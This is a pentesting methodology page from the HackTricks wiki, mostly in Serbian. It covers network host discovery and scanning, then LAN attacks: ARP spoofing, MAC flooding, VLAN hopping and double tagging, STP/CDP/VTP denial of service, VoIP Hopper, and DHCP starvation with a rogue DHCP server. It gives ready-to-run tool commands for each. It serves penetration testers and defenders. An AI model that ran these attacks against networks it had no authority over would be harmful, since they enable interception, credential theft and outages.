hacktricks/generic-methodologies-and-resources/pentesting-network
2024-07-29 11:04:42 +00:00
..
dhcpv6.md Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:27:34 +00:00
eigrp-attacks.md Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:27:34 +00:00
glbp-and-hsrp-attacks.md Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:27:34 +00:00
ids-evasion.md Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:27:34 +00:00
lateral-vlan-segmentation-bypass.md Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:51:32 +00:00
network-protocols-explained-esp.md Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:27:34 +00:00
nmap-summary-esp.md Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:27:34 +00:00
pentesting-ipv6.md Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:27:34 +00:00
README.md Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:15:30 +00:00
spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:27:34 +00:00
spoofing-ssdp-and-upnp-devices.md Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:51:32 +00:00
webrtc-dos.md Translated ['generic-methodologies-and-resources/pentesting-network/webr 2024-07-29 11:04:42 +00:00

Pentesting Network

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}


Bug bounty tip: prijavite se za Intigriti, premium bug bounty platformu koju su kreirali hakeri, za hakere! Pridružite nam se na https://go.intigriti.com/hacktricks danas, i počnite da zarađujete nagrade do $100,000!

{% embed url="https://go.intigriti.com/hacktricks" %}

Discovering hosts from the outside

Ovo će biti kratka sekcija o tome kako pronaći IP adrese koje odgovaraju sa Interneta.
U ovoj situaciji imate neki opseg IP adresa (možda čak i nekoliko raspona) i samo treba da pronađete koje IP adrese odgovaraju.

ICMP

Ovo je najlakši i najbrži način da otkrijete da li je host aktivan ili ne.
Možete pokušati da pošaljete neke ICMP pakete i očekujete odgovore. Najlakši način je jednostavno slanje echo zahteva i očekivanje odgovora. To možete uraditi koristeći jednostavan ping ili koristeći fping za raspone.
Takođe možete koristiti nmap da pošaljete druge tipove ICMP paketa (to će izbeći filtere za uobičajene ICMP echo zahtev-odgovor).

ping -c 1 199.66.11.4    # 1 echo request to a host
fping -g 199.66.11.0/24  # Send echo requests to ranges
nmap -PE -PM -PP -sn -n 199.66.11.0/24 #Send echo, timestamp requests and subnet mask requests

TCP Port Discovery

Veoma je uobičajeno da se svi tipovi ICMP paketa filtriraju. Tada, sve što možete da uradite da proverite da li je host aktivan je pokušati da pronađete otvorene portove. Svaki host ima 65535 portova, tako da, ako imate "veliki" opseg, ne možete testirati da li je svaki port svakog hosta otvoren ili ne, to će potrajati previše vremena.
Tada, ono što vam je potrebno je brzi skener portova (masscan) i lista najčešće korišćenih portova:

#Using masscan to scan top20ports of nmap in a /24 range (less than 5min)
masscan -p20,21-23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 199.66.11.0/24

Možete takođe izvršiti ovaj korak sa nmap, ali je sporije i nmap ima problema sa identifikovanjem aktivnih hostova.

HTTP Port Discovery

Ovo je samo otkrivanje TCP portova korisno kada želite da se fokusirate na otkrivanje HTTP usluga:

masscan -p80,443,8000-8100,8443 199.66.11.0/24

UDP Port Discovery

Možete takođe pokušati da proverite da li je neki UDP port otvoren kako biste odlučili da li treba da obratite više pažnje na host. Pošto UDP servisi obično ne odgovaraju sa bilo kojim podacima na običan prazan UDP probe paket, teško je reći da li je port filtriran ili otvoren. Najlakši način da to odlučite je da pošaljete paket vezan za aktivnu uslugu, a pošto ne znate koja usluga radi, trebali biste probati najverovatniju na osnovu broja porta:

nmap -sU -sV --version-intensity 0 -F -n 199.66.11.53/24
# The -sV will make nmap test each possible known UDP service packet
# The "--version-intensity 0" will make nmap only test the most probable

Linija nmap koja je predložena ranije će testirati top 1000 UDP portova na svakom hostu unutar /24 opsega, ali čak i to će trajati >20min. Ako su potrebni najbrži rezultati, možete koristiti udp-proto-scanner: ./udp-proto-scanner.pl 199.66.11.53/24 Ovo će poslati ove UDP probe na njihov očekivani port (za /24 opseg ovo će trajati samo 1 min): DNSStatusRequest, DNSVersionBindReq, NBTStat, NTPRequest, RPCCheck, SNMPv3GetRequest, chargen, citrix, daytime, db2, echo, gtpv1, ike, ms-sql, ms-sql-slam, netop, ntp, rpc, snmp-public, systat, tftp, time, xdmcp.

SCTP Otkriće Portova

#Probably useless, but it's pretty fast, why not trying?
nmap -T4 -sY -n --open -Pn <IP/range>

Pentesting Wifi

Ovde možete pronaći lep vodič o svim poznatim Wifi napadima u vreme pisanja:

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Otkriće hostova iznutra

Ako ste unutar mreže, jedna od prvih stvari koje ćete želeti da uradite je da otkrijete druge hostove. U zavisnosti od koliko buke možete/želite da napravite, različite akcije se mogu izvesti:

Pasivno

Možete koristiti ove alate za pasivno otkrivanje hostova unutar povezane mreže:

netdiscover -p
p0f -i eth0 -p -o /tmp/p0f.log
# Bettercap
net.recon on/off #Read local ARP cache periodically
net.show
set net.show.meta true #more info

Active

Napomena da se tehnike komentarisane u Otkrivanju hostova sa spoljne strane (TCP/HTTP/UDP/SCTP Otkriće portova) takođe mogu primeniti ovde.
Ali, pošto ste u isto mreži kao i ostali hostovi, možete raditi više stvari:

#ARP discovery
nmap -sn <Network> #ARP Requests (Discover IPs)
netdiscover -r <Network> #ARP requests (Discover IPs)

#NBT discovery
nbtscan -r 192.168.0.1/24 #Search in Domain

# Bettercap
net.probe on/off #Discover hosts on current subnet by probing with ARP, mDNS, NBNS, UPNP, and/or WSD
set net.probe.mdns true/false #Enable mDNS discovery probes (default=true)
set net.probe.nbns true/false #Enable NetBIOS name service discovery probes (default=true)
set net.probe.upnp true/false #Enable UPNP discovery probes (default=true)
set net.probe.wsd true/false #Enable WSD discovery probes (default=true)
set net.probe.throttle 10 #10ms between probes sent (default=10)

#IPv6
alive6 <IFACE> # Send a pingv6 to multicast.

Active ICMP

Napomena da se tehnike komentarisane u Otkrivanju hostova sa spolja (ICMP) takođe mogu primeniti ovde.
Ali, pošto ste u isto mreži kao i ostali hostovi, možete uraditi više stvari:

  • Ako pingujete adresu za emitovanje podmreže, ping bi trebao da stigne do svakog hosta i oni bi mogli da odgovore vama: ping -b 10.10.5.255
  • Pingovanjem adresu za emitovanje mreže mogli biste čak pronaći hostove unutar drugih podmreža: ping -b 255.255.255.255
  • Koristite -PE, -PP, -PM zastavice nmap za otkrivanje hostova slanjem ICMPv4 echo, vremenskih oznaka, i zahteva za masku podmreže: nmap -PE -PM -PP -sn -vvv -n 10.12.5.0/24

Wake On Lan

Wake On Lan se koristi za uključivanje računara putem mrežne poruke. Magični paket koji se koristi za uključivanje računara je samo paket u kojem je MAC Dst naveden, a zatim se ponavlja 16 puta unutar istog paketa.
Ove vrste paketa se obično šalju u ethernet 0x0842 ili u UDP paketu na port 9.
Ako nema [MAC] naveden, paket se šalje na emitovanje ethernet (a emitovani MAC će biti onaj koji se ponavlja).

# Bettercap (if no [MAC] is specificed ff:ff:ff:ff:ff:ff will be used/entire broadcast domain)
wol.eth [MAC] #Send a WOL as a raw ethernet packet of type 0x0847
wol.udp [MAC] #Send a WOL as an IPv4 broadcast packet to UDP port 9

Skenerisanje hostova

Kada otkrijete sve IP adrese (spoljašnje ili unutrašnje) koje želite detaljno skenirati, mogu se izvršiti različite radnje.

TCP

  • Otvoren port: SYN --> SYN/ACK --> RST
  • Zatvoren port: SYN --> RST/ACK
  • Filtriran port: SYN --> [NEMA ODGOVORA]
  • Filtriran port: SYN --> ICMP poruka
# Nmap fast scan for the most 1000tcp ports used
nmap -sV -sC -O -T4 -n -Pn -oA fastscan <IP>
# Nmap fast scan for all the ports
nmap -sV -sC -O -T4 -n -Pn -p- -oA fullfastscan <IP>
# Nmap fast scan for all the ports slower to avoid failures due to -T4
nmap -sV -sC -O -p- -n -Pn -oA fullscan <IP>

#Bettercap Scan
syn.scan 192.168.1.0/24 1 10000 #Ports 1-10000

UDP

Postoje 2 opcije za skeniranje UDP porta:

  • Pošaljite UDP paket i proverite odgovor ICMP unreachable ako je port zatvoren (u nekoliko slučajeva ICMP će biti filtriran pa nećete dobiti nikakve informacije ako je port zatvoren ili otvoren).
  • Pošaljite formatirane datagrame da izazovete odgovor od usluge (npr., DNS, DHCP, TFTP i druge, kako je navedeno u nmap-payloads). Ako dobijete odgovor, onda je port otvoren.

Nmap će kombinovati obe opcije koristeći "-sV" (UDP skeniranja su veoma spora), ali imajte na umu da su UDP skeniranja sporija od TCP skeniranja:

# Check if any of the most common udp services is running
udp-proto-scanner.pl <IP>
# Nmap fast check if any of the 100 most common UDP services is running
nmap -sU -sV --version-intensity 0 -n -F -T4 <IP>
# Nmap check if any of the 100 most common UDP services is running and launch defaults scripts
nmap -sU -sV -sC -n -F -T4 <IP>
# Nmap "fast" top 1000 UDP ports
nmap -sU -sV --version-intensity 0 -n -T4 <IP>
# You could use nmap to test all the UDP ports, but that will take a lot of time

SCTP Scan

SCTP (Stream Control Transmission Protocol) je dizajniran da se koristi zajedno sa TCP (Transmission Control Protocol) i UDP (User Datagram Protocol). Njegova glavna svrha je da olakša transport telefonskih podataka preko IP mreža, odražavajući mnoge karakteristike pouzdanosti koje se nalaze u Signaling System 7 (SS7). SCTP je osnovna komponenta SIGTRAN protokol porodice, koja ima za cilj transport SS7 signala preko IP mreža.

Podršku za SCTP pružaju različiti operativni sistemi, kao što su IBM AIX, Oracle Solaris, HP-UX, Linux, Cisco IOS, i VxWorks, što ukazuje na njegovu široku prihvaćenost i korisnost u oblasti telekomunikacija i umrežavanja.

Dva različita skeniranja za SCTP nudi nmap: -sY i -sZ

# Nmap fast SCTP scan
nmap -T4 -sY -n -oA SCTFastScan <IP>
# Nmap all SCTP scan
nmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan <IP>

IDS i IPS izbegavanje

{% content-ref url="ids-evasion.md" %} ids-evasion.md {% endcontent-ref %}

Više nmap opcija

{% content-ref url="nmap-summary-esp.md" %} nmap-summary-esp.md {% endcontent-ref %}

Otkivanje unutrašnjih IP adresa

Pogrešno konfigurisani ruteri, vatrozidi i mrežni uređaji ponekad odgovaraju na mrežne probe koristeći nejavne izvorne adrese. tcpdump se može koristiti za identifikaciju paketa primljenih sa privatnih adresa tokom testiranja. Konkretno, na Kali Linux-u, paketi se mogu uhvatiti na eth2 interfejsu, koji je dostupan sa javnog Interneta. Važno je napomenuti da, ako je vaša konfiguracija iza NAT-a ili vatrozida, takvi paketi verovatno neće biti propušteni.

tcpdump nt -i eth2 src net 10 or 172.16/12 or 192.168/16
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth2, link-type EN10MB (Ethernet), capture size 65535 bytes
IP 10.10.0.1 > 185.22.224.18: ICMP echo reply, id 25804, seq 1582, length 64
IP 10.10.0.2 > 185.22.224.18: ICMP echo reply, id 25804, seq 1586, length 64

Sniffing

Sniffing možete saznati detalje o IP opsezima, veličinama podmreža, MAC adresama i nazivima hostova pregledanjem uhvaćenih okvira i paketa. Ako je mreža pogrešno konfigurisana ili je switching fabric pod stresom, napadači mogu uhvatiti osetljive materijale putem pasivnog mrežnog sniffinga.

Ako je preklopna Ethernet mreža pravilno konfigurisana, videćete samo broadcast okvire i materijale namenjene vašoj MAC adresi.

TCPDump

sudo tcpdump -i <INTERFACE> udp port 53 #Listen to DNS request to discover what is searching the host
tcpdump -i <IFACE> icmp #Listen to icmp packets
sudo bash -c "sudo nohup tcpdump -i eth0 -G 300 -w \"/tmp/dump-%m-%d-%H-%M-%S-%s.pcap\" -W 50 'tcp and (port 80 or port 443)' &"

Može se, takođe, uhvatiti pakete sa udaljenog računara preko SSH sesije koristeći Wireshark kao GUI u realnom vremenu.

ssh user@<TARGET IP> tcpdump -i ens160 -U -s0 -w - | sudo wireshark -k -i -
ssh <USERNAME>@<TARGET IP> tcpdump -i <INTERFACE> -U -s0 -w - 'port not 22' | sudo wireshark -k -i - # Exclude SSH traffic

Bettercap

net.sniff on
net.sniff stats
set net.sniff.output sniffed.pcap #Write captured packets to file
set net.sniff.local  #If true it will consider packets from/to this computer, otherwise it will skip them (default=false)
set net.sniff.filter #BPF filter for the sniffer (default=not arp)
set net.sniff.regexp #If set only packets matching this regex will be considered

Wireshark

Očigledno.

Capturing credentials

Možete koristiti alate kao što su https://github.com/lgandx/PCredz za parsiranje kredencijala iz pcap-a ili sa aktivnog interfejsa.

LAN attacks

ARP spoofing

ARP Spoofing se sastoji u slanju besplatnih ARP odgovora kako bi se naznačilo da IP mašine ima MAC našeg uređaja. Tada će žrtva promeniti ARP tabelu i kontaktirati našu mašinu svaki put kada želi da kontaktira IP koji je spoofovan.

Bettercap

arp.spoof on
set arp.spoof.targets <IP> #Specific targets to ARP spoof (default=<entire subnet>)
set arp.spoof.whitelist #Specific targets to skip while spoofing
set arp.spoof.fullduplex true #If true, both the targets and the gateway will be attacked, otherwise only the target (default=false)
set arp.spoof.internal true #If true, local connections among computers of the network will be spoofed, otherwise only connections going to and coming from the Internet (default=false)

Arpspoof

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -t 192.168.1.1 192.168.1.2
arpspoof -t 192.168.1.2 192.168.1.1

MAC Flooding - CAM overflow

Preplavite CAM tabelu prekidača slanjem velikog broja paketa sa različitim izvornih MAC adresama. Kada je CAM tabela puna, prekidač počinje da se ponaša kao hub (šalje sve saobraćaje).

macof -i <interface>

U modernim prekidačima ova ranjivost je ispravljena.

802.1Q VLAN / DTP napadi

Dinamičko trunkovanje

Dynamic Trunking Protocol (DTP) je dizajniran kao protokol na link sloju kako bi olakšao automatski sistem za trunkovanje, omogućavajući prekidačima da automatski biraju portove za trunk mod (Trunk) ili non-trunk mod. Implementacija DTP se često smatra pokazateljem suboptimalnog dizajna mreže, naglašavajući važnost ručne konfiguracije trunkova samo gde je to neophodno i osiguranje pravilne dokumentacije.

Podrazumevano, portovi prekidača su postavljeni da rade u Dynamic Auto modu, što znači da su spremni da iniciraju trunkovanje ako ih susedni prekidač na to podstakne. Bezbednosna zabrinutost se javlja kada se pentester ili napadač poveže na prekidač i pošalje DTP Desirable okvir, primoravajući port da pređe u trunk mod. Ova akcija omogućava napadaču da enumeriše VLAN-ove kroz analizu STP okvira i zaobiđe VLAN segmentaciju postavljanjem virtuelnih interfejsa.

Prisutnost DTP u mnogim prekidačima podrazumevano može biti iskorišćena od strane protivnika da oponaša ponašanje prekidača, čime se stiče pristup saobraćaju kroz sve VLAN-ove. Skripta dtpscan.sh se koristi za praćenje interfejsa, otkrivajući da li je prekidač u Default, Trunk, Dynamic, Auto ili Access modu—potonji je jedina konfiguracija imuna na VLAN hopping napade. Ovaj alat procenjuje status ranjivosti prekidača.

Ukoliko se identifikuje ranjivost mreže, alat Yersinia može biti korišćen za "omogućavanje trunkovanja" putem DTP protokola, omogućavajući posmatranje paketa iz svih VLAN-ova.

apt-get install yersinia #Installation
sudo apt install kali-linux-large #Another way to install it in Kali
yersinia -I #Interactive mode
#In interactive mode you will need to select a interface first
#Then, you can select the protocol to attack using letter "g"
#Finally, you can select the attack using letter "x"

yersinia -G #For graphic mode

Da biste enumerisali VLAN-ove, takođe je moguće generisati DTP Desirable okvir pomoću skripte DTPHijacking.py**. **Ne prekidajte skriptu ni pod kojim okolnostima. Ona injektuje DTP Desirable svake tri sekunde. Dinamčki kreirani trunk kanali na switch-u žive samo pet minuta. Nakon pet minuta, trunk se gasi.

sudo python3 DTPHijacking.py --interface eth0

Želeo bih da naglasim da Access/Desirable (0x03) označava da je DTP okvir tipa Desirable, što govori portu da pređe u Trunk režim. A 802.1Q/802.1Q (0xa5) označava tip enkapsulacije 802.1Q.

Analizom STP okvira, saznajemo o postojanju VLAN 30 i VLAN 60.

Napad na specifične VLAN-ove

Kada znate VLAN ID-ove i IP vrednosti, možete konfigurisati virtuelno sučelje za napad na specifičan VLAN.
Ako DHCP nije dostupan, koristite ifconfig da postavite statičku IP adresu.

root@kali:~# modprobe 8021q
root@kali:~# vconfig add eth1 250
Added VLAN with VID == 250 to IF -:eth1:-
root@kali:~# dhclient eth1.250
Reloading /etc/samba/smb.conf: smbd only.
root@kali:~# ifconfig eth1.250
eth1.250  Link encap:Ethernet  HWaddr 00:0e:c6:f0:29:65
inet addr:10.121.5.86  Bcast:10.121.5.255  Mask:255.255.255.0
inet6 addr: fe80::20e:c6ff:fef0:2965/64 Scope:Link
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:19 errors:0 dropped:0 overruns:0 frame:0
TX packets:13 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2206 (2.1 KiB)  TX bytes:1654 (1.6 KiB)

root@kali:~# arp-scan -I eth1.250 10.121.5.0/24
# Another configuration example
modprobe 8021q
vconfig add eth1 20
ifconfig eth1.20 192.168.1.2 netmask 255.255.255.0 up
# Another configuration example
sudo vconfig add eth0 30
sudo ip link set eth0.30 up
sudo dhclient -v eth0.30

Automatic VLAN Hopper

Napad o dinamičkom trunkingu i kreiranju virtuelnih interfejsa za otkrivanje hostova unutar drugih VLAN-ova se automatski izvršava alatom: https://github.com/nccgroup/vlan-hopping---frogger

Double Tagging

Ako napadač zna vrednost MAC, IP i VLAN ID žrtve, može pokušati da duplo označi okvir sa svojim dodeljenim VLAN-om i VLAN-om žrtve i pošalje paket. Kako žrtva neće moći da se poveže nazad sa napadačem, najbolja opcija za napadača je komunikacija putem UDP-a sa protokolima koji mogu izvršiti neke zanimljive akcije (kao što je SNMP).

Druga opcija za napadača je da pokrene TCP port skeniranje lažirajući IP koji kontroliše napadač i koji je dostupan žrtvi (verovatno putem interneta). Tada bi napadač mogao da prisluškuje na drugom hostu koji mu pripada ako primi neke pakete od žrtve.

Da biste izvršili ovaj napad, možete koristiti scapy: pip install scapy

from scapy.all import *
# Double tagging with ICMP packet (the response from the victim isn't double tagged so it will never reach the attacker)
packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='192.168.1.10')/ICMP()
sendp(packet)

Lateral VLAN Segmentation Bypass

Ako imate pristup switch-u na koji ste direktno povezani, imate mogućnost da obiđete VLAN segmentaciju unutar mreže. Jednostavno prebacite port u trunk mode (poznat i kao trunk), kreirajte virtuelne interfejse sa ID-evima ciljanih VLAN-ova i konfigurišite IP adresu. Možete pokušati da zatražite adresu dinamički (DHCP) ili je možete konfigurisati statički. To zavisi od slučaja.

{% content-ref url="lateral-vlan-segmentation-bypass.md" %} lateral-vlan-segmentation-bypass.md {% endcontent-ref %}

Layer 3 Private VLAN Bypass

U određenim okruženjima, kao što su mreže za goste, izolacija portova (poznata i kao privatni VLAN) postavke se implementiraju kako bi se sprečilo da klijenti povezani na bežični pristupni tačku direktno komuniciraju jedni s drugima. Međutim, identifikovana je tehnika koja može zaobići ove mere izolacije. Ova tehnika koristi ili nedostatak mrežnih ACL-ova ili njihovu nepravilnu konfiguraciju, omogućavajući IP paketima da se rutiraju kroz ruter kako bi došli do drugog klijenta na istoj mreži.

Napad se izvršava kreiranjem paketa koji nosi IP adresu odredišnog klijenta, ali sa MAC adresom rutera. To uzrokuje da ruter greškom prosledi paket ciljanom klijentu. Ovaj pristup je sličan onom koji se koristi u Double Tagging Attacks, gde se sposobnost kontrole hosta dostupnog žrtvi koristi za iskorišćavanje sigurnosne slabosti.

Ključni koraci napada:

  1. Kreiranje paketa: Paket je posebno kreiran da uključuje IP adresu ciljanog klijenta, ali sa MAC adresom rutera.
  2. Iskorišćavanje ponašanja rutera: Kreirani paket se šalje ka ruteru, koji, zbog konfiguracije, preusmerava paket ka ciljanom klijentu, zaobilazeći izolaciju koju pružaju postavke privatnog VLAN-a.

VTP Attacks

VTP (VLAN Trunking Protocol) centralizuje upravljanje VLAN-ovima. Koristi brojeve revizije za održavanje integriteta VLAN baze podataka; svaka izmena povećava ovaj broj. Switch-evi usvajaju konfiguracije sa višim brojevima revizije, ažurirajući svoje VLAN baze podataka.

VTP Domain Roles

  • VTP Server: Upravljanje VLAN-ovima—kreira, briše, modifikuje. Emituje VTP obaveštenja članovima domena.
  • VTP Client: Prima VTP obaveštenja kako bi sinhronizovao svoju VLAN bazu podataka. Ova uloga je ograničena od lokalnih modifikacija VLAN konfiguracije.
  • VTP Transparent: Ne učestvuje u VTP ažuriranjima, ali prosleđuje VTP obaveštenja. Nije pogođen VTP napadima, održava konstantan broj revizije nula.

VTP Advertisement Types

  • Summary Advertisement: Emituje ga VTP server svake 300 sekundi, noseći suštinske informacije o domenu.
  • Subset Advertisement: Šalje se nakon promena u VLAN konfiguraciji.
  • Advertisement Request: Izdaje ga VTP klijent da zatraži Summary Advertisement, obično kao odgovor na otkrivanje višeg broja revizije konfiguracije.

VTP ranjivosti su iskoristive isključivo putem trunk portova, jer VTP obaveštenja cirkulišu samo kroz njih. Post-DTP scenariji napada mogu se preusmeriti ka VTP-u. Alati poput Yersinia mogu olakšati VTP napade, sa ciljem da unište VLAN bazu podataka, efikasno ometajući mrežu.

Napomena: Ova diskusija se odnosi na VTP verziju 1 (VTPv1).

%% yersinia -G # Launch Yersinia in graphical mode ```

U Yersinia-inom grafičkom režimu, izaberite opciju za brisanje svih VTP VLAN-ova da biste očistili VLAN bazu podataka.

STP Napadi

Ako ne možete da uhvatite BPDU okvire na vašim interfejsima, malo je verovatno da ćete uspeti u STP napadu.

STP BPDU DoS

Slanjem velikog broja BPDUs TCP (Obaveštenje o promeni topologije) ili Conf (BPDUs koji se šalju kada se topologija kreira) prekidači su preopterećeni i prestaju da rade ispravno.

yersinia stp -attack 2
yersinia stp -attack 3
#Use -M to disable MAC spoofing

STP TCP Attack

Kada se TCP pošalje, CAM tabela prekidača će biti obrisana za 15s. Tada, ako neprekidno šaljete ovu vrstu paketa, CAM tabela će se neprekidno restartovati (ili svakih 15 sekundi) i kada se restartuje, prekidač se ponaša kao hub.

yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds
yersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen

STP Root Attack

Napadač simulira ponašanje prekidača kako bi postao STP root mreže. Tada će više podataka prolaziti kroz njega. Ovo je zanimljivo kada ste povezani na dva različita prekidača.
To se postiže slanjem BPDUs CONF paketa koji govore da je prioritet vrednost manja od stvarnog prioriteta stvarnog root prekidača.

yersinia stp -attack 4 #Behaves like the root switch
yersinia stp -attack 5 #This will make the device behaves as a switch but will not be root

Ako je napadač povezan na 2 prekidača, može postati koren novog stabla i sav saobraćaj između tih prekidača će prolaziti kroz njega (biće izvršen MITM napad).

yersinia stp -attack 6 #This will cause a DoS as the layer 2 packets wont be forwarded. You can use Ettercap to forward those packets "Sniff" --> "Bridged sniffing"
ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpackages

CDP Napadi

CISCO Discovery Protocol (CDP) je ključan za komunikaciju između CISCO uređaja, omogućavajući im da identifikuju jedni druge i dele detalje konfiguracije.

Pasivno prikupljanje podataka

CDP je podešen da emituje informacije kroz sve portove, što može dovesti do bezbednosnog rizika. Napadač, prilikom povezivanja na port prekidača, može koristiti mrežne sniffer-e kao što su Wireshark, tcpdump ili Yersinia. Ova akcija može otkriti osetljive podatke o mrežnom uređaju, uključujući njegov model i verziju Cisco IOS-a koju koristi. Napadač bi zatim mogao ciljati specifične ranjivosti u identifikovanoj verziji Cisco IOS-a.

Indukcija CDP Tabele Flooding

Agresivniji pristup uključuje pokretanje napada uskraćivanja usluge (DoS) preplavljivanjem memorije prekidača, pretvarajući se da su legitimni CISCO uređaji. Ispod je redosled komandi za pokretanje takvog napada koristeći Yersinia, alat za testiranje mreže:

sudo yersinia cdp -attack 1 # Initiates a DoS attack by simulating fake CISCO devices
# Alternatively, for a GUI approach:
sudo yersinia -G

Tokom ovog napada, CPU prekidača i CDP tabela suseda su jako opterećeni, što dovodi do onoga što se često naziva “paraliza mreže” zbog prekomerne potrošnje resursa.

CDP Impersonation Attack

sudo yersinia cdp -attack 2 #Simulate a new CISCO device
sudo yersinia cdp -attack 0 #Send a CDP packet

Možete takođe koristiti scapy. Obavezno ga instalirajte sa scapy/contrib paketom.

VoIP napadi i VoIP Hopper alat

VoIP telefoni, sve više integrisani sa IoT uređajima, nude funkcionalnosti poput otključavanja vrata ili kontrolisanja termostata putem posebnih brojeva telefona. Međutim, ova integracija može predstavljati sigurnosne rizike.

Alat voiphopper je dizajniran da emulira VoIP telefon u raznim okruženjima (Cisco, Avaya, Nortel, Alcatel-Lucent). Otkriva VLAN ID glasovne mreže koristeći protokole kao što su CDP, DHCP, LLDP-MED i 802.1Q ARP.

VoIP Hopper nudi tri moda za Cisco Discovery Protocol (CDP):

  1. Sniff Mode (-c 0): Analizira mrežne pakete kako bi identifikovao VLAN ID.
  2. Spoof Mode (-c 1): Generiše prilagođene pakete koji imitiraju one stvarnog VoIP uređaja.
  3. Spoof with Pre-made Packet Mode (-c 2): Šalje pakete identične onima određenog Cisco IP telefonskog modela.

Preferirani mod za brzinu je treći. Zahteva specificiranje:

  • Mrežnog interfejsa napadača (-i parametar).
  • Imena VoIP uređaja koji se emulira (-E parametar), u skladu sa Cisco formatom imenovanja (npr. SEP praćeno MAC adresom).

U korporativnim okruženjima, da bi se imitirao postojeći VoIP uređaj, može se:

  • Ispitati MAC oznaku na telefonu.
  • Navigirati podešavanjima prikaza telefona da bi se videli podaci o modelu.
  • Povezati VoIP uređaj na laptop i posmatrati CDP zahteve koristeći Wireshark.

Primer komande za izvršavanje alata u trećem modu bio bi:

voiphopper -i eth1 -E 'SEP001EEEEEEEEE ' -c 2

DHCP Napadi

Enumeracija

nmap --script broadcast-dhcp-discover
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 05:30 EDT
WARNING: No targets were specified, so 0 hosts scanned.
Pre-scan script results:
| broadcast-dhcp-discover:
|   Response 1 of 1:
|     IP Offered: 192.168.1.250
|     DHCP Message Type: DHCPOFFER
|     Server Identifier: 192.168.1.1
|     IP Address Lease Time: 1m00s
|     Subnet Mask: 255.255.255.0
|     Router: 192.168.1.1
|     Domain Name Server: 192.168.1.1
|_    Domain Name: mynet
Nmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds

DoS

Dva tipa DoS mogu se izvesti protiv DHCP servera. Prvi se sastoji u simulaciji dovoljno lažnih hostova da se iskoriste sve moguće IP adrese.
Ovaj napad će raditi samo ako možete videti odgovore DHCP servera i završiti protokol (Discover (Comp) --> Offer (server) --> Request (Comp) --> ACK (server)). Na primer, ovo nije moguće u Wifi mrežama.

Drugi način za izvođenje DHCP DoS je slanje DHCP-RELEASE paketa koristeći kao izvorni kod svaku moguću IP adresu. Tada će server pomisliti da su svi završili sa korišćenjem IP adrese.

yersinia dhcp -attack 1
yersinia dhcp -attack 3 #More parameters are needed

Jedan automatskiji način za to je korišćenje alata DHCPing

Možete koristiti pomenute DoS napade da primorate klijente da dobiju nove zakupnine unutar okruženja i iscrpite legitimne servere tako da postanu neodgovorni. Tako kada se legitimni pokušaju ponovo povezati, možete poslužiti zlonamerne vrednosti pomenute u sledećem napadu.

Postavljanje zlonamernih vrednosti

Rogue DHCP server može biti postavljen koristeći DHCP skriptu koja se nalazi na /usr/share/responder/DHCP.py. Ovo je korisno za mrežne napade, poput hvatanja HTTP saobraćaja i kredencijala, preusmeravanjem saobraćaja na zlonamerni server. Međutim, postavljanje rogue gateway-a je manje efikasno jer samo omogućava hvatanje izlaznog saobraćaja sa klijenta, propuštajući odgovore sa pravog gateway-a. Umesto toga, preporučuje se postavljanje rogue DNS ili WPAD servera za efikasniji napad.

Ispod su opcije komandi za konfiguraciju rogue DHCP servera:

  • Naša IP adresa (Gateway Advertisement): Koristite -i 10.0.0.100 da reklamirate IP vaše mašine kao gateway.
  • Lokalno DNS ime domena: Opcionalno, koristite -d example.org da postavite lokalno DNS ime domena.
  • Originalni Router/Gateway IP: Koristite -r 10.0.0.1 da navedete IP adresu legitimnog rutera ili gateway-a.
  • Primarna DNS Server IP: Koristite -p 10.0.0.100 da postavite IP adresu rogue DNS servera koji kontrolišete.
  • Sekundarna DNS Server IP: Opcionalno, koristite -s 10.0.0.1 da postavite sekundarnu DNS server IP.
  • Mrežna maska lokalne mreže: Koristite -n 255.255.255.0 da definišete mrežnu masku za lokalnu mrežu.
  • Interfejs za DHCP saobraćaj: Koristite -I eth1 da slušate DHCP saobraćaj na određenom mrežnom interfejsu.
  • WPAD konfiguraciona adresa: Koristite -w “http://10.0.0.100/wpad.dat” da postavite adresu za WPAD konfiguraciju, pomažući u presretanju web saobraćaja.
  • Lažiranje IP adrese podrazumevanog gateway-a: Uključite -S da lažirate IP adresu podrazumevanog gateway-a.
  • Odgovarajte na sve DHCP zahteve: Uključite -R da server odgovara na sve DHCP zahteve, ali budite svesni da je ovo bučno i može biti otkriveno.

Ispravnim korišćenjem ovih opcija, rogue DHCP server može biti uspostavljen za efikasno presretanje mrežnog saobraćaja.

# Example to start a rogue DHCP server with specified options
